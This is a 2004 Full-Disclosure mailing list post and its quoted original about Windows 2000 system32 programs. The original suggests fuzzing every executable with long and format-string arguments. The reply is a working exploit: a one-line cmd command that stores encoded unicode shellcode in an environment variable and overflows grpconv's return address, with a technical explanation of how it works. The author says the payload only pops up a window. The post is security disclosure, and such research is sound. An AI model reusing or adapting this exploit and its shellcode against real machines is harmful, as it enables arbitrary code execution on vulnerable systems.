[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Test your windows OS

Anybody wanna try if this shows a popup ? It's 1 line, if it wraps put it back 
together:
-------------------------------
set 
!!!!!!=YAIAIAIAIAIAIAIAIAIAIAIAIAIAIA44jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBKLP1WPQT4K10P04KOPLLDKBPMLVMTKBHLH2HRLRLKPKPRH03P2NN1T2H3EBSQURRPT7K2QEWK8KN9X21KPKPKPSYZOTIWUNQYB0RK8MPKPKPM0Q1RLBLMPD9ROSE2RO0S2QQT3QUMP1QBRQUMPQR1U2L2O2NC7O0RTROMPBURSMQKPYXLTKPKPM0R3BKD90LS9RNQURDMPBP3G2N1UQTMPBY2OBUMQKPPR7KZBLLI9JZ9XKQKPKPM0HLQFPWTKQ5OLDKPTKUT8M1YZQB4K22MPKQIZNQI0NQ99OQDKP4DJM1JNP1KOWQ8OMCVLM1XGU5WPSEKFNY9ORUIZ1J4KQJNDKQJKS6TKLLPKDKPZMLKQJKDKKTTKKQYX1OQNKOYPA
 && %SystemRoot%\system32\grpconv 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 
AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ^N^A^N^A-------------------------------
Let me know if it works (off-list) and what system you're using. I developed it 
on win2ken sp4.
Tech stuff:
The string "^N^A^N^A" at the end should be typed "ctrl+N, ctrl+A, ctrl+N, 
ctrl+A". It works by installing a unicode shellcode in the environment string 
"!!!!!!" at 0x00010000. This should alphabetically be the first string so the 
shellcode should be at 0x0001000e. I overwrite a return address 
(^N^A=0x0001000e). The unicode shellcode needs to know it's own baseaddress, 
that's why there's "^N^A" twice: the first one is used to return, the second 
one is poped of by the shellcode to get the baseaddress.

Cheers,
SkyLined

----- Original Message ----- 
From: "Berend-Jan Wever" <skylined@xxxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Monday, October 04, 2004 17:39
Subject: [Full-Disclosure] Test your windows OS


> Hi all,
> 
> Wanna do a quick test to see if the programmers that wrote your windows 
> operating system have any clue as to what there doing ? Run these commands 
> from cmd.exe in the system32 directory:
> 
> for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
> for %i in (*.exe) do start %i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... 
> (type as much "A"-s as cmd.exe allows on one line.)
> 
> Each command will execute every program in your system32 directory, most of 
> them will either ignore the parameter or report an error because the 
> parameter doesn't make sence... But on my win2k system I found 6 programs 
> vulnerable to these very simple formatsting and BoF tests.... grpconv even 
> gives EIP 0x00410041, can it be any easier?
> 
> These are not vulnerabilities in itself: you cannot gain access or elevate 
> priviledges but I just wanted to let you know that these programmers did a 
> sloppy job.
> 
> Cheers,
> SkyLined
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html